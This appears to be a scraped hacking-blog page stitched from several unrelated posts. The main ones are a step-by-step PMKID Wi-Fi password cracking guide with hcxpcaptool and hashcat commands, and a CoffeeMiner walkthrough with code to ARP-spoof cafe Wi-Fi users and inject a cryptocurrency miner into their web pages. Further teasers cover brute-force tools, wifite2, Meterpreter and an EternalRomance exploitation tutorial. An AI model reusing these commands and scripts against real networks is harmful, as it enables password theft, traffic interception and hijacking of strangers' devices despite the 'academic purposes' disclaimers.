Learn how to hack Wi-Fi password of modern routers Wifi password hacking has become popular as people are always in search of the free i...
Learn how to hack Wi-Fi password of modern routers
Wifi password hacking has become popular as people are always in search of the free internet. But due to the advancement of technology, cracking passwords have become a difficult task to do. The reason is due to the implementation of WPA/WPA2 (wifi protected access) protocols. They made modern routers more secure and less prone to hacking.
Luckily security researchers have revealed a new way to hack these modern wi-fi routers. This new hack was accidentally discovered by Jens Steube (lead developer in popular password-cracking tool Hashcat) while he was analyzing the newly-launched WPA3 protocol. According to him, this hack will explicitly work against WPA/WPA2 wireless network protocols with Pairwise Master Key Identifier (PMKID)-based roaming features enabled. This hack will surely allow attackers (aka.Hackers) to recover the Pre-shared Key (PSK) login passwords.
Disclaimer: All content in this article are intended for security research purpose only. Techworm does not support the use of any tool to indulge in unethical practices.
How to Hack WiFi Password Using PMKID
4-Way Handshake based PMKID stands for pairwise key management protocol. According to Steube (security researcher), previous wifi attacking methods requires someone to log into the network so that attackers can capture EAPOL (Extensible Authentication Protocol (EAP) over LAN ) which is a network authentication protocol used in IEEE 802.1X. whereas new hack doesn’t require a user to be on a target network in order to capture credentials. Following are the steps to perform this wifi hack:-
Step-1: A hacker can use a tool such as hcxpcaptool to request the PMKID from the targeted access point and dump the received frame to a file.
Step-2: Using the hcxpcaptool , the output (in pcapng format) of the frame can be converted into a hash format accepted by Hashcat like this.
$ ./hcxpcaptool -z test.16800 test.pcapng
Step-3: Now you can use this password cracking tool to obtain the WPA PSK (Pre-Shared Key) password and Boom you did it!
$ ./hashcat -m 16800 test.16800 -a 3 -w 3 ‘?l?l?l?l?l?lt!’
That’s the password of your targeted wireless network which may take time to crack depending on its size or length complexity.
Now we are not sure about which vendors this technique will work. But Steube said it will work against all 802.11i/p/q/r networks with roaming functions enabled (most modern routers). So users are highly advised to protect their WiFi networks with a secure password such as making the use of numbers, characters and some special characters as they are difficult to crack. At last, we want to admit that this hack won’t work against next-gen WPA3 simply because of the new harder to break protocol.
Disclamer: this article & project is for academic purposes only. Some weeks ago I read about this Starbucks case where hackers hijack...
Disclamer: this article & project is for academic purposes only.
Some weeks ago I read about this Starbucks case
where hackers hijacked laptops on the WiFi network to use the devices
computing power to mine cryptocurrency, and I thought it might be
interesting perform the attack in a different way.
The goal of this article, is to explain how can be done the attack of
MITM (Man(Person)-In-The-Middle) to inject some javascript in the html
pages, to force all the devices connected to a WiFi network to be mining
a cryptocurrency for the attacker.
The objective is to have a script that performs autonomous attack on the WiFi network. It’s what we have called CoffeeMiner, as it’s a kind of attack that can be performed in the cafes WiFi networks.
1. The Scenario
The scenario will be some machines connected to the WiFi network, and
the CoffeeMiner attacker intercepting the traffic between the users and
the router.
1.1 Scenario configuration
The real scenario is a WiFi with laptops and smartphones connected.
We have tested in this real world scenario, and it works. But for this
article, we will see more deeply how to set up in a virtual environment.
We will use VirtualBox to deploy our virtual scenario https://www.virtualbox.org/ .
First of all we need to download some Linux disk image and install it
into a VirtualBox machine, for this example we will use Kali Linux
images https://www.kali.org/
Once we have the ISO image downloaded, we prepare 3 VBox machines with the Linux image installed.
To configure the defined scenario we need to prepare the machines each one with a role:
Victim
will be the machine that connects to the Router and browse some pages.
Attacker
will be the machine where it runs the CoffeeMiner. Is the machine that performs the MITM.
Router / Gateway
will act as a normal gateway.
Once the attack is performed, the scenario will be:
To configure each one of the machines, we will do the following configuration:
Victim
network adapter:
eth0: Host-only Adapter
/etc/network/interfaces:
auto lo
iface lo inet loopback
auto eth0
iface eth0 inet static
address 10.0.2.10
netmask 255.255.255.0
gateway 10.0.2.15
Attacker
network adapter:
eth0: Host-only Adapter
/etc/network/interfaces:
auto lo
iface lo inet loopback
auto eth0
iface eth0 inet static
address 10.0.2.20
netmask 255.255.255.0
gateway 10.0.2.15
Router / Gateway
network adapter:
eth0: Bridged Adapter
eth1: Host-only Adapter
/etc/network/interfaces:
auto lo
iface lo inet loopback
auto eth0
iface eth0 inet dhcp
auto eth1
iface eth1 inet static
address 10.0.2.15
netmask 255.255.255.0
2. CoffeeMiner, understanding the code
2.1 ARPspoofing
First of all, we need to understand how the MITM attack is performed.
From wikipedia: “In computer networking, ARP spoofing, ARP cache poisoning, or
ARP poison routing, is a technique by which an attacker sends (spoofed)
Address Resolution Protocol (ARP) messages onto a local area network.
Generally, the aim is to associate the attacker’s MAC address with the
IP address of another host, such as the default gateway, causing any
traffic meant for that IP address to be sent to the attacker instead.” https://en.wikipedia.org/wiki/ARP_spoofing
To perform the ARPspoofing attack, we will use the dsniff library.
mitmproxy is a
software tool that allows us to analyze the traffic that goes through a
host, and allows to edit that traffic. In our case, we will use it to
inject the javascript into the html pages.
To make the process more more clean, we will only inject one line of
code into the html pages. And will be that line of html code that will
call to the javascript cryptocurrency miner.
The line to inject the crypto miner is:
As we have seen, the injector adds a line to the html, with a call to
our javascript crypto miner. So, we need to have the script file
deployed in a HTTP Server.
In order to serve the javascript cryptocurrency miner, we will deploy
a HTTP Server in the attacker machine. To do that, we will use the
Python library ‘http.server’:
#!/usr/bin/env pythonimport http.server
import socketserver
import os
PORT = 8000
web_dir = os.path.join(os.path.dirname(__file__), 'miner_script')
os.chdir(web_dir)
Handler = http.server.SimpleHTTPRequestHandler
httpd = socketserver.TCPServer(("", PORT), Handler)
print("serving at port", PORT)
httpd.serve_forever()
The code above is a simple HTTP Server that will serve our crypto miner to the victims, when they require it.
The javascript miner, will be placed in the /miner_script directory. In our case, we have used the CoinHive javascript miner.
2.5 CoinHive crypto miner
CoinHive is a javascript miner for the Monero cryptocurrency
(XMR). It can be added to a website, and will use the user CPU power to
calculate hashes with the Cryptonight PoW hash algorithm to mine
Monero, based on CryptoNote protocol.
CoinHive miner makes sense when user stays in a websit for mid-long
term sessions. So, for example, for a website where the users average
session is arround 40 seconds, it doesn’t make much sense.
In our case, as we will inject the crypto miner in each one of the
HTML pages that victims request, will have long term sessions to
calculate hashes to mine Monero.
3. CoffeeMiner, puting all together
The main objective is to tie all the previous concepts in one autonomous deployment. This will be the CoffeeMiner.
The idea is to have the CoffeeMiner script that performs the
ARPspoofing attack and set ups the mitmproxy to inject the CoinHive
cryptominer into victims HTML pages.
First of all, we need to configure the ip_forwarding and IPTABLES, in order to convert the attacker’s machine into a proxy:
To perform the ARPspoof for all the victims, we will prepare a
‘victims.txt’ file with all the victim’s IP.
To read all the victims IPs, we prepare some Python lines, that will get
the IPs (and also the gateway IP from the command line args), and
performs the ARPspoof for each one of the victim’s IP.
# get gateway_ip
gateway = sys.argv[1]
print("gateway: " + gateway)
# get victims_ip
victims = [line.rstrip('\n') for line in open("victims.txt")]
print("victims:")
print(victims)
# run the arpspoof for each victim, each one in a new consolefor victim in victims:
os.system("xterm -e arpspoof -i eth0 -t " + victim + " " + gateway + " &")
os.system("xterm -e arpspoof -i eth0 -t " + gateway + " " + victim + " &")
Once we have the ARPspoofing performed, we just need to run the HTTP Server:
> python3 httpServer.py
And now, we can run the mitmproxy with the injector.py:
In order to do the demo, we set up the VirtualBox scenario explained above.
If we want to perform the attack manually, we will need the following terminals:
Then, once the ARPspoofing attack is done and the injector and the
HTTP Server are ready, we can go to the victim’s machine and browse to a
website. The victim’s traffic will go through the attacker machine, and
will activate the injector:
As a result, the html pages that the victim is viewing, will have the html lines of code that the attacker has been injected.
4.1 Demo video
In the following video, we can see the complete attack in the scenario, using the coffeeMiner.py script:
VirtualBox demo:
Real world WiFi network and laptops demo:
Conclusion
As we have seen, the attack can be easily performed, and also can be deployed to be an autonomous attack in a WiFi network.
Another think to have in mind, is that for a real world WiFi network,
is better to perform the process with a powerful WiFi antenna, to reach
better all the physical zone.
Tha main objective was to perform the autonomous attack, but we still
need to edit the victims.txt file with the IP addresses of the victims
devices. For a further version, a possible feature could be adding an
autonomous Nmap scan, to add the IPs detected to the CoffeeMiner victims list. Another further feature, could be adding sslstrip, to make sure the injection also in the websites that the user can request over HTTPS.
The complete code is available in the github repo: https://github.com/arnaucode/coffeeMiner Disclamer: this article & project is for academic purposes only. tags: python, cryptocurrency, miner, blockchain, mitm, wifi, javascript, hacking, html, cryptominer, python3
Introduction Vulscan is a module which enhances nmap to a vulnerability scanner. The nmap option -sV enables version detection per servic...
Introduction
Vulscan is a module which enhances nmap to a vulnerability scanner.
The nmap option -sV enables version detection per service which is used
to determine potential flaws according to the identified product. The
data is looked up in an offline version of VulDB.
BruteSploit is a collection of method for automated Generate, Bruteforce and Manipulation wordlist with interactive shell. That can be use...
BruteSploit is a collection of method for automated Generate, Bruteforce
and Manipulation wordlist with interactive shell. That can be used
during a penetration test to enumerate and can be used in CTF for
manipulation,combine,transform and permutation some words or file text.
A complete re-write of wifite , a Python script for auditing wireless networks. What's new? Lots of files instead of "one...
A complete re-write of wifite, a Python script for auditing wireless networks.
What's new?
Lots of files instead of "one big script".
Cleaner process management -- No longer leaves processes running in the background.
UX: Target access points are refreshed every second instead of every 5 seconds.
UX: Displays realtime Power level (in db) of currently-attacked target
What's not new?
Backwards compatibility with the original wifite's arguments.
Same text-based interface everyone knows and loves.
Full Feature List
Reaver Pixie-Dust attack (--pixie)
Reaver WPS PIN attack (--reaver)
WPA handshake capture (--no-reaver)
Validates handshakes against pyrit, tshark, cowpatty, and aircrack-ng
Various WEP attacks (replay, chopchop, fragment, etc)
5Ghz support for wireless cards that support 5ghz (use -5 option)
Stores cracked passwords and handshakes to the current directory, with metadata about the access point (via --cracked command).
Decloaks hidden access points when channel is fixed (use -c <channel> option)
Provides commands to crack captured WPA handshakes (via --crack command)
Support Wifite2 is designed entirely for the latest version of Kali Rolling release (tested on Kali 2016.2, updated May 2017). This means only the latest versions of these programs are supported: Aircrack-ng suite, wash, reaver, tshark, cowpatty. Other pen-testing distributions (such as BackBox) have outdated versions of these suites; these distributions are not supported.
Using Meterpreter Commands Since the Meterpreter provides a whole new environment, we will cover some of the basic Meterpreter comman...
Using Meterpreter Commands
Since the Meterpreter provides a whole new environment, we will cover some of the basic Meterpreter commands to get you started and help familiarize you with this most powerful tool. Throughout this course, almost every availableMeterpreter command is covered. For those that aren’t covered, experimentation is the key to successful learning.
help
The ‘help‘ command, as may be expected, displays the Meterpreter help menu.
meterpreter > help
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
channel Displays information about active channels
...snip...
Eternalromance is another SMBv1 exploit from the leaked NSA exploit collection and targets Windows XP/Vista/7 and Windows Server 2003 and 2...
Eternalromance is another SMBv1 exploit from the leaked NSA exploit collection and targets Windows XP/Vista/7 and Windows Server 2003 and 2008. In the last hacking tutorial we have demonstrated how an unauthenticated attacks can exploit a Windows 7 target that is vulnerable to Eternalblue using Fuzzbunch, DoublePulsar and Empire. In this tutorial we will demonstrate how to exploit a Windows 2003 R2 SP2 Enterprise installation using the Eternalromance exploit in Fuzzbunch. The exploit process is pretty similar to Eternalblue except that we have to use DoublePulsar to generate shellcode that will be used by the Eternalromance exploit. Any other shellcode than DoublePulsar will not work and causes a BSOD.
Before we start with exploiting Eternalromance we will be looking at the lab setup that we will be using throughout the tutorial. Then we will use a Metasploit auxiliary module to check if the target has been patched or not. Finally we will install the DoublePulsar backdoor using the Eternalromance exploit on the Windows Server 2003 machine and use that to inject a Meterpreter payload that will give us a shell on the target.
LazyKali is an awesome script written in bash shell. It can automate the whole update and install new tools in your hack repository. As the...
LazyKali is an awesome script written in bash shell. It can automate the whole update and install new tools in your hack repository. As the name suggests, you can get all the updates on Kali Linux and your repositories in one place by running this script.
Offensive Security has updated the Kali Linux images with new features and changes. Termed Kali Linux 2017.1, this release comes with su...
Offensive Security has updated the Kali Linux images with new features and changes. Termed Kali Linux 2017.1, this release comes with support for wireless injection attacks to 802.11ac and Nvidia CUDA GPU. You can simply update your existing installation by running few commands if you don’t wish to download the updated images from Kali repos.
![[WAF-FLE] Web application firewall: fast log and event console](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNUiNj5SjQeu8VhkRyfVjV4mP1bHFkRLpos0NqOznjOFmrqXmnTaqDd-0btKDqtpn3Ay_K8B6Vy75b8yyJyCeSZrUY7NJPG0GRBfEbdmFs1A7fpWMRKQa5jzzm8JOrTc3zAC7GIumQmTk/s72-c/waf-fle.png "[WAF-FLE] Web application firewall: fast log and event console")